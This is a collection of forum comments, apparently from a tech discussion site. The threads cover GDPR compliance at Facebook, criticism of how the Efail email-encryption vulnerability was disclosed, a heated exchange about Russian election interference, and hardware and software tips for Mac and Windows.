Do you think that the GDPR has really changed anything for either Facebook or its users? Do you think that anything changed in the way data is being handled? All i see is a bunch of highly paid law firms writing up 200 additional pages in terms and conditions to shield the company, but nothing really changed as far as daily business is concerned.
If a company has money to hire lawyers to make an extra 200 pages of T&Cs, I'm sure they will have the money to argue that those pages are "concise, transparent, intelligible, easily accessible, and it must use clear and plain language".
Apparently they are already GDPR compliant (FB). In their case it's actually easy to justify their legitimate interest because their entire business is the handling of private data. Ironically, even though GDPR is supposed to affect things like facebook more, it changes very little about the way they work.
Whether their business model is handling data is irrelevant; they must ask for consent to use that data for ads and such - and that's even if they already have collected the data to provide a service requested by the user.
They recently came out with a new screen asking users to consent to a bunch of things, so they weren't compliant until then, and I wouldn't bet they are now.
As if a brand name, logo and website were not enough, even the white paper title is cringy clickbait: "Efail: Breaking S/MIME and OpenPGP Email Encryption using
Exfiltration Channels".
OpenPGP is not broken. Nothing in your paper has anything to do with OpenPGP. This is simply spreading overblown FUD for your 15 minutes of mainstream media fame.
But it isn't a crypto attack at all. Gpg is doing what it is supposed to do, and the overall cryptography is not effected. It's bad clients that are the problem.
It strips the PGP MDC and then uses a malleability attack on CFB or CBC to inject content, but it's not a crypto attack? You have a definition of "crypto attack" that nobody in the field uses.
To be fair, a very large part of this attack is not about PGP at all. That part is about abusing email-client rendering of partly encrypted messages, and abusing S/MIME to get message malleability again exploited via HTML.
Again, this is like saying that BEAST isn't really about TLS, because you need a particular combination of client features to exploit it. The two attacks are almost exactly analogous in this respect. But PGP has a cheering section, and TLS doesn't.
I mean that the first attack (having A PGP encrypted middle of an email that the client just expands to plaintext) and the attack on S/MIME have nothing to do with PGP mistakes in PGP at all.
The gadget attack on PGP is completely an exploit against PGP, but this publication also treats other attacks. At the very least, if you weigh this by volume of text, they focus a lot on pure client mistakes (first attack) and S/MIME (half of second attack).
I don't even understand why they needed to tease the thing one day in advance with measures that were so weird that nobody knew what to expect. "Stop decrypting email", right, super convenient and totally appropriate given the actual vulnerability. Next time maybe they'll say "don't touch your mouse until further notice". What difference would it have made if they had simply published this website straight away? Seemed like they were releasing the teaser for the next Captain America movie or something.
This reminds me a bit of the "amdflaws" debacle, although that one was even shadier and might have been an attempt at manipulating AMD's stock price.
The comparison with amdflaws seems unfair. My understanding is that while they demonstrate a flaw in some email clients, it would be enough for an attacker to exploit one vulnerable target amongst the recipients to retrieve the plaintext email. Given that one cannot confirm whether others have taken appropriate steps, this vulnerability seems serious enough, no?
The amdflaws were real vulnerabilities too. The problem in both cases is that they messed up the disclosure so badly (in the case of amdflaws probably purposefully, here probably simply by mistake and maybe hubris) that you end up talking more about the disclosure than the problem itself.
This one day "teaser" makes no sense from a security perspective, especially when it fails to actually tell you the proper way to mitigate the attack (no, "do not use PGP or S/MISE" is not a reasonable mitigation for people who actually rely on these technologies, especially when you can mitigate the attack by changing your settings or using a different client). Saying that PGP and S/MIME themselves are broken when it's mainly (but not entirely) a MUA problem is also rather disingenuous.
amdflaws were "if you have admin access, you have admin access". This is "oh shit, mail clients / crypto plugins will stitch together '<img src="' + decrypted content + '">' and send your secrets to the attacker". Sounds much more serious.
Amdflaws was more like "if you have admin access you can backdoor the secure boot infrastructure" while this is "if an attacker manages to intercept an encrypted HTML email and send it to you modified and you use a MUA with dubious security setting with regards to HTML then you're at risk".
The issues are so different that it's probably pointless to try to rank them by severity. I personally always considered that HTML email was a terrible idea security-wise so the idea of HTML PGP sounds a bit like putting mustard on pasta. That being said the PGP/SMIME implementations really ought to detect tampering and error out in this situation, it's always better to fail early.
Because as we all know, the US is special and gets to fuck with everybody else's elections (up to and including the violent overthrow of a democratically elected government and state executed assassination), but do it to them and suddenly it's a warlike act.
> Because as we all know, the US is special and gets to fuck with everybody else's elections (up to and including the violent overthrow of a democratically elected government and state executed assassination), but do it to them and suddenly it's a warlike act.
I have no idea of your political inclinations, but generally I find it odd that the right is overall giving a pass to Russia with this. Deflecting as you are doing, and not answering the issue at hand.
Russia, formerly via Communism, was all but our enemy shortly after WW2. They are still an adversary. So, we decided it was in our best interest to fuck with them, and many other countries because we were "the good guys". Yes, this got convoluted and contrived, and completely futile -- especially w.r.t. Vietnam, the Bay of Pigs, Panama, and many others I imagine.
But even considering all that, it still doesn't justify Russia interfering with our election. Surprising? No.
But why are so many on the right giving Russia a free-pass? It all seems to be the same motivation that kept us in Vietnam for years after it was known to be a waste: To avoid admitting you were wrong; to try and save face.
I don't think they should get a free pass, so good job on your assumptions there, kiddo.
I'm more taking issue with people that are shocked, just shocked that other counties would treat the US the way that the US treats other countries. It's childish and amusing. The power of American Exceptionalism, what can you do?
> I don't think they should get a free pass, so good job on your assumptions there, kiddo.
The first sentence of my reply explicitly stated that I was not talking about you, just that you are doing the same thing the right is doing to deflect. Remember, this was your original low effort post:
>> muh russian hackers
>This nonsense is really getting old
So to claim now that:
> I'm more taking issue with people that are shocked, just shocked that other counties would treat the US the way that the US treats other countries.
Is what you are taking issue with appears to be disingenuous. You implied all this Russia hacking stuff was nonsense.
Minor updates, security patches etc. via the App Store usually work just fine. Major OS updates (like going from El Capitan to Sierra) are a pain in the a. But there is no guarantee for any of this, as a rule of thumb: the closer you are to "original" hardware, the less problems you will experience.
The current real Mac Pro actually has two ethernet ports too. There are a number of ways this could be useful.
Number one would obviously be to connect to two different networks. It could also be useful in a scenario where the machine is used as a server and you want a semi-redundant backup network line. It could also be used to directly connect to a NAS box via Ethernet.
you can bridge network cards to double your connection speed. You can connect to 2 different networks (load balancing or 2 different Internet Server Providers). You can run multiple virtual machines on your mac and separate traffic instead of putting all into one adapter. Multiple LAN is a norm now, especially if you in IT.
Not all of them, at least. There are some restrictions with regard to profiles and levels that are supported (i.e. bells and whistles that the codec can use).
Some things are very hard to compile (or to find binaries) like scientific,cryptographic etc. Other things like uwsgi don't work at all. celery 4 won't be supported for windows. You can't `pip install wheezy.web` (too lazy to debug). Some (most)things do work on cygwin but it still kinda sucks.
